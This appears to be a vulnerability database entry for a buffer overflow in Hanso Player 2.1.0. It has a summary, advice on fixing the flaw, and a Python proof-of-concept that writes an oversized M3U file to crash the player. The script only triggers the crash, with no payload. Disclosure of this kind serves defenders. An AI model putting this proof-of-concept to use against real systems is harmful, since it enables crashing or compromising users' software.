header-logo
Suggest Exploit
vendor:
Hanso Player
by:
metacom
9,3
CVSS
HIGH
Buffer Overflow
119
CWE
Product Name: Hanso Player
Affected Version From: 2.1.0
Affected Version To: 2.1.0
Patch Exists: YES
Related CWE: N/A
CPE: hanso-player
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows 7 German
2020

Buffer Overflow Vulnerability Hanso Player version 2.1.0

A buffer overflow vulnerability exists in Hanso Player version 2.1.0. An attacker can exploit this vulnerability by creating a malicious M3U file containing a large amount of junk data and sending it to the target user. When the target user opens the malicious file, the buffer overflow will occur, allowing the attacker to execute arbitrary code on the target system.

Mitigation:

Users should update to the latest version of Hanso Player to patch this vulnerability. Additionally, users should be cautious when opening files from untrusted sources.
Source

Exploit-DB raw data:

#!/usr/bin/python
# Exploit Title:Buffer Overflow Vulnerability Hanso Player version 2.1.0
# Download link :www.hansotools.com/downloads/hanso-player-setup.exe
# Author: metacom
# RST
# version: 2.1.0
# Category: poc
# Tested on: windows 7 German  

f=open("fuzzzzz.m3u","w")
print "Creating expoit."

junk="\x41" * 5000

try:    
    f.write(junk)
    f.close()
    print "File created"
except:
    print "File cannot be created"

Navigation

Suggest Exploit

Services By CQR